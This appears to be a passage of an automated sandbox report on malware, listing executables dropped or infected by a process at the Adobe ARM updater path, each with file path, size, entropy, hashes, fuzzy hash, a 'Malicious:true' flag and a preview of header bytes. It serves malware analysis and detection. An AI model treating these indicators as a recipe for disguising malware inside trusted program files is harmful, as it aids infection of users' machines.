                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.529374096652101
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:AmmMiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:3v/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:9A035E37D3F446D10F2D06C7007309F1
                                                                                                                                                                              SHA1:26128B7F49BC8E07F399024F4A77166E32720DF0
                                                                                                                                                                              SHA-256:A3FC2556F3DF39D7BA59998E92A1137F7DC91A6492F6A71E6C3DC788DE2DF458
                                                                                                                                                                              SHA-512:5D3C605D9A00AC48AA555E09739EA58CAEB17DC37B731CDF0D59BBB2BD8DFE2E92775C5BFA4BFF8798906C12A41446312F338CF9B7DC9681A7B1AF480B52597A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................Lz.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.530218020253746
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:nnmwiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:nT/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:D4A73F30030BDC00B42155F50478221C
                                                                                                                                                                              SHA1:0CA17D6DE3D3A6BDA5A45C2948A9627FC4C74C72
                                                                                                                                                                              SHA-256:F426F0BC101BA134F6D59C398DBB8DF83DF6A86A9B613985D6B8EFA5E2D9B951
                                                                                                                                                                              SHA-512:9FAB993F036CCB54437B8DD3AB83FEB0E1319A31040C7D33A5EA943A4B4CBCA937DD92E83D7A792301D35FFCC84CFA2ABAE70BE78E54A2F528E5D0F81F853C50
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.529357666425191
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:PT5EiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:7g/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:DE85AC430B6A6092980107049E5DE533
                                                                                                                                                                              SHA1:832D78B8BB3FE124198CDEF9162196DE590DC837
                                                                                                                                                                              SHA-256:DBBFF4E80494075AAE7B2A2F3B7C2E6BFA7AB563A27E6E97493FBB875EE44067
                                                                                                                                                                              SHA-512:04757DE3E0DCB1D2E4FF71BC15FEADBD4FD13CC1E41FDA147E2B80EB651461CB237537E9C290D8D2007DCF608834DE47E7D305651460B9D17C8F1F5004E64DE8
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................j........................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.529391543572566
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:qw/siJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:je/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:30539970DFF430CEC3C95636B3284B24
                                                                                                                                                                              SHA1:DD7F1DB3E60DAF5D2E2395702C0F5BB918F28ACC
                                                                                                                                                                              SHA-256:9101F5F209C81509C2EDD19CA34511A8CF8C5F356D9C9BE7735A3306DFBCD458
                                                                                                                                                                              SHA-512:58488FD5A886F805442273CCB962CCBAEDC0B82664AF89FB9713B5A37FCD198A1140034995125C40976323A1B6066F911949F0CDE48538F047B0CE27B935C019
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.529297417814367
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:TAmciJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:kv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:DB28A939365C2C4C4B6AEDA172902D89
                                                                                                                                                                              SHA1:59AFBBF435A47AB264C77355EDB9DD17B2D7F03F
                                                                                                                                                                              SHA-256:7500DFC9733F113596B6FAA20826B03815F94902573BD7264AF5395E62144BC9
                                                                                                                                                                              SHA-512:1376A0B6B4387B0EC289AA8241773DA917737ED84974AFD493555FECD93AFF9E0A7E9353A6BA8114865CC43F176BBC3E55DD90CD57846CC4D9D63BED2FAC3F5A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................J.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.5293510690708665
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:F1SkiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:X7/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:F1966D1D86AEE9A484738BF0FEEA06DF
                                                                                                                                                                              SHA1:A399371597A8F7785EFB4E9A3EA0E88CA212A7B7
                                                                                                                                                                              SHA-256:677C26954A386C2055776DF46FA56E77ABF0DC02B6D312980C98A7CCCFB73D27
                                                                                                                                                                              SHA-512:9F2BF6B91FEF8D8E91F6A0F32F9524C95C66037AEE0990C72F56824BDF8BCACA8B06769A446FC58E921C331E1E73187858C23A6FC3B851511B9B71A17864502F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.529403094588803
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:zU/siJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:4e/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:F8117B49BEFEE0A9286FBD45C1C1C250
                                                                                                                                                                              SHA1:04CDDB9A62A1CA601321DA3F092D7B3BCF3AB9A1
                                                                                                                                                                              SHA-256:67C49E88745BBAD67053F886665A500643704956EFA8E559BA89DC788EBF5967
                                                                                                                                                                              SHA-512:433372A2EAD4CAC19125DC73E666C505F826255FA793414DEA6FD36CE5D0469CD29ED84BAD40AF7D2BEAA329CE6A0147C11C6ACD6F60FD6E2619B3CF25319F2C
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1358336
                                                                                                                                                                              Entropy (8bit):4.612118388953632
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:OEA/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OjLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:9045F0A40527CCBE255EBDC8CEA12EFD
                                                                                                                                                                              SHA1:757A9D53ECACE96B5607054F39FA262FD2E8A200
                                                                                                                                                                              SHA-256:BFB3F96C5B4556F2FC648F3AA4B5A36AED735514AE4ECEF3E4EE1D519EDD0C83
                                                                                                                                                                              SHA-512:6DAEB8CFB798D100E5FB6B4D23189496784733E28D973182B9239F6BB4179D4AE7018C2674CB6EA427734BD45A452FC4EFEA98C22F6DBFADC06A320F41BB2D99
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.................................IQ..........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1298432
                                                                                                                                                                              Entropy (8bit):4.528979673098073
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:YFQAiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:CF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:A8138CA1CBD04B910311ED692B1DFD31
                                                                                                                                                                              SHA1:4D6CAFB7B60B5211015BCE4E238A23A2C42C3458
                                                                                                                                                                              SHA-256:B208CC9A7BC79E572E60E25FD0E3962B5C8DAF5EF6C90B32F632E7C6D07DDCF1
                                                                                                                                                                              SHA-512:E1EC0AA1FAA1F9E0E5C93BCE29C808685E81DE305AE4E34B352A86EF2AD0A004575C9CCE405D7449501B02AF61B4501936780B9682018778848A193BAED4E45A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@.................................d........................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...`...P.......0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1454592
                                                                                                                                                                              Entropy (8bit):4.787858363291528
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:5i7le3roAU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:AloroAULNiXicJFFRGNzj3
                                                                                                                                                                              MD5:2D4BA2AF0879BE0FCA1826705F2AFF4F
                                                                                                                                                                              SHA1:F62B964A6669667B8A730ECC21DF9482D69617F7
                                                                                                                                                                              SHA-256:C67A49C6F8E334DD589BE13F26E87F844BAA8F56B5F076B16EE6DCFC09F90CDC
                                                                                                                                                                              SHA-512:DC97EFB73B458456A48FA2771625379F15497D0E8B09C8ED06D9373CC3712BC7BB4FD71A042C76553D40F20547497C437420298CB477212336B227E6F3BEF726
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................@!.....N...................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1424896
                                                                                                                                                                              Entropy (8bit):4.811518200640379
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:1NfQNI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:/GILNiXicJFFRGNzj3
                                                                                                                                                                              MD5:3A9D548EE40CA49EF92046275CD4C991
                                                                                                                                                                              SHA1:343C056A655493A308CE805F803571A9C59D62B8
                                                                                                                                                                              SHA-256:149B6DDF22FEF876D0616F327C16FCF196D75E4EFA203CEC867820D6AF3C1FE8
                                                                                                                                                                              SHA-512:9BB84E2534039A127A2B2F2BA62434E1F51795E8C237F123028904F00CD63119E5902D6024B02FFA1CAEF65CA34BD16732BC9989FD0E98722B2C6B41C323028A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................... .............................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...p...@......................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1443328
                                                                                                                                                                              Entropy (8bit):4.83241372960241
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:KLib/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ZLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:51CC955DBD8A82C14FDE76DC60E8B59D
                                                                                                                                                                              SHA1:A86C53F083C1A7F60F91235426F8D11B1565F8DF
                                                                                                                                                                              SHA-256:2D4550F9A1DF26A111CE1D4C0EB714BB8379BAF0B2C6175AA62E6F70DB31D5BA
                                                                                                                                                                              SHA-512:573146783F92BFF0F106E23732B11092312AEC0283F4E69619D698146FC2F99EF6C8256C10A5BB471957DF013427A5E34F7F6726C08046186287F958728E63C9
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1443328
                                                                                                                                                                              Entropy (8bit):4.832412373043977
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:fLib/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ELNiXicJFFRGNzj3
                                                                                                                                                                              MD5:C3950F6C939BBE3A7DEFBCA8CCD439D2
                                                                                                                                                                              SHA1:19D53ED3A15721194ED41BB9232C5D2189554B3F
                                                                                                                                                                              SHA-256:0B7FCEC112BCDC6C22AD39529FADC931316395ABCB35DBB9E15368F177B31077
                                                                                                                                                                              SHA-512:E0B4C008BA1AB09A6DB59BA82E8253C3EA134234B76A9D9B42FBE687ADDF5CB98A223582D44E4B3BE90451B67D18B24C039610D440BEA71AE886FB51156A6F27
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... ..... ............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1499136
                                                                                                                                                                              Entropy (8bit):4.787958024517551
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:Ffn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FfnLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:04AD7F5BB0A9D4D8841DDF55766C968D
                                                                                                                                                                              SHA1:81D494ED6A2EE8EE27310078EF1E02A79857D7CC
                                                                                                                                                                              SHA-256:CE201B6CFC4362C37926526A4B14CB81589A8146B088F02B7D14FC3A70A3F456
                                                                                                                                                                              SHA-512:3561DCFC1323E6B3091D0368C39B9D90F6499C294A45D87B715E718ACB8E22443F727EA7178C597A1176E317FA32B4B38BEFA8A64939B28872382B1CD5A5448A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@..............................!........... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc.......0....... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1651712
                                                                                                                                                                              Entropy (8bit):5.15348767702533
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:FbUO42K/Ex/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FRxLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:7FCECA32F245BC33B23FA0A90F141A01
                                                                                                                                                                              SHA1:557CBD9DDD1B247A300C1EC49472C704F935C98C
                                                                                                                                                                              SHA-256:01D9A7123260E129F462F9450C2D52675826D570205E779E73A6FBE197449016
                                                                                                                                                                              SHA-512:5F7A7EB2602365249BE683520661FC0EC1116E68BCC3BB0D157376EFF9B39F8E23BB8FDA3BCFB02DC00C4E2C12578154E34D2D25D52D40A70358B51697393E01
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@..........................0$.....@............ ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...............d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):52712960
                                                                                                                                                                              Entropy (8bit):7.961745067083342
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1572864:6KjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:NicZmsR3Lo/cnLe
                                                                                                                                                                              MD5:A672AD10F358F8E7BD2213C61C0683C7
                                                                                                                                                                              SHA1:EBE097D333BCD6302D76EB8ACCBC2CB4F3E68BB9
                                                                                                                                                                              SHA-256:09BB34812220F30A20298EBB192ABBE3AB05D00E7D248CB894C93A24291E8B78
                                                                                                                                                                              SHA-512:24C33FBD7276E2C31A926B5FDA4DA21731F18CF739041316477747AD0EF26F21FF56669BE16AB0D0721BEE67FF114D4ECE004C08A783B8DAF24987FEB13E34FA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.......$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1812992
                                                                                                                                                                              Entropy (8bit):5.2500115165861985
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:Jd8DMeflpnIOvYU4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:JCDD9pnIOqLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:5213131E8048BAB1099B7570DF3AB023
                                                                                                                                                                              SHA1:312BF81E1D21A80A1E97B7434D41B6D561A13EED
                                                                                                                                                                              SHA-256:1F5F17D56D00B8303C8ED1E0AB96B41030D936A17485641208D7C33120FA1AE7
                                                                                                                                                                              SHA-512:1D393EDBCEEC4F2B59F952F4BF4E6F1E4F550D754B7A0A9AF96AAD2D03D5ECC347A0B20BA9D4ABA0372AE82A8BDFB6B4F3946D5680557C90D78BA01D2696710F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@..............................'.....^..... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...`..........................@...................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4364800
                                                                                                                                                                              Entropy (8bit):6.745649234967871
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:PB1sstqMHiq8kBfK9a+cOVE/TqEpEepdkRqqUu9wg6KFYso8l8ERLNiXicJFFRGN:jHzorVmr2gkRpdJYoln7wRGpj3
                                                                                                                                                                              MD5:032EA851990553681FB46AB5FA8FCF14
                                                                                                                                                                              SHA1:51D35588E2309C53C5BDC15C7683238A9A92EE25
                                                                                                                                                                              SHA-256:89F74977DE3E2ABC6DCF0FBBDABE36269F9CC6364216B25593D799A4949981D2
                                                                                                                                                                              SHA-512:1FB43FE20C61835C852594A00D73144CECB75630F9DA275DFBD243DE7B9FE9E6F6080FBAECF19A50F007A5B3FABC1E76D38E4823540177AEA2C408326E3BFB3A
                                                                                                                                                                              Malicious:true
